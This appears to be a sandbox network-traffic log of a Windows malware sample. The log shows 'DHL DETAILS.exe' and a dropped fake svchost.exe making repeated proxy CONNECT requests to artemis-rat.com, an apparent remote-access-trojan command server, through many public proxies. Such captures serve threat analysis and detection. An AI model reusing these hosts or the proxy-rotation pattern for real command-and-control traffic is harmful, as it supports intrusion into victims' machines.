Mar 9, 2024 13:14:16.748891115 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1083	192.168.2.5	52809	51.222.241.157	51718	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.759299040 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1084	192.168.2.5	52853	201.174.239.28	4153	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.766328096 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1085	192.168.2.5	52535	184.170.249.65	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.776818037 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1086	192.168.2.5	53315	84.39.112.144	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.778907061 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1087	192.168.2.5	53314	43.128.146.42	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.785554886 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1088	192.168.2.5	53316	8.218.231.62	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.796241045 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1089	192.168.2.5	53317	167.172.86.46	10471	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.817333937 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1090	192.168.2.5	53328	129.213.150.205	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.822421074 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1091	192.168.2.5	53321	23.137.248.197	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.822916031 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1092	192.168.2.5	53308	64.43.89.102	6361	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.888925076 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.541825056 CET	459	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization." Proxy-Connection: close X-Webshare-Error: 407 X-Webshare-Reason: invalidpassword Date: Sat, 09 Mar 2024 12:14:17 GMT Content-Length: 121 Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1093	192.168.2.5	53319	45.118.132.180	45449	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.891531944 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1094	192.168.2.5	53299	116.199.168.1	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.891645908 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1095	192.168.2.5	53322	46.35.9.110	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.895761967 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1096	192.168.2.5	52810	176.77.9.22	55443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.908876896 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.038538933 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1097	192.168.2.5	53185	95.164.207.157	58378	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.928026915 CET	1260	IN	HTTP/1.1 403 Forbidden Server: squid/3.5.20 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:16 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3661 X-Squid-Error: ERR_ACCESS_DENIED 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from ezproxies.com X-Cache-Lookup: NONE from ezproxies.com:58378 Via: 1.1 ezproxies.com (squid/3.5.20) Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verd

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1098	192.168.2.5	53313	94.131.64.94	58378	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.928103924 CET	1260	IN	HTTP/1.1 403 Forbidden Server: squid/3.5.20 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:16 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3661 X-Squid-Error: ERR_ACCESS_DENIED 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from ezproxies.com X-Cache-Lookup: NONE from ezproxies.com:58378 Via: 1.1 ezproxies.com (squid/3.5.20) Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verd

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1099	192.168.2.5	52996	177.234.244.174	32213	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.952744961 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.567672014 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1100	192.168.2.5	53331	51.15.247.93	16379	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.953809977 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1101	192.168.2.5	53329	60.188.102.225	18080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.972374916 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1102	192.168.2.5	53330	185.49.31.207	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.976929903 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1103	192.168.2.5	52998	8.217.143.187	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.988607883 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.676973104 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1104	192.168.2.5	51414	5.252.23.220	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.993752003 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.067785978 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:23.145365000 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.248508930 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1105	192.168.2.5	53008	43.155.142.116	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.007886887 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1106	192.168.2.5	52983	178.54.21.203	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.012168884 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1107	192.168.2.5	53332	8.219.228.100	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.024224997 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1108	192.168.2.5	53007	60.190.68.154	7302	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.043205023 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.390265942 CET	90	IN	HTTP/1.1 200 OK Content-Type: application/json Connection: close Content-Length: 55

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1109	192.168.2.5	53334	202.162.219.10	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.048080921 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1110	192.168.2.5	52952	195.177.217.131	58053	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.063997984 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.224092960 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1111	192.168.2.5	53336	202.83.102.83	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.064001083 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1112	192.168.2.5	53341	188.166.17.18	8881	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.068263054 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1113	192.168.2.5	53382	104.16.221.57	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
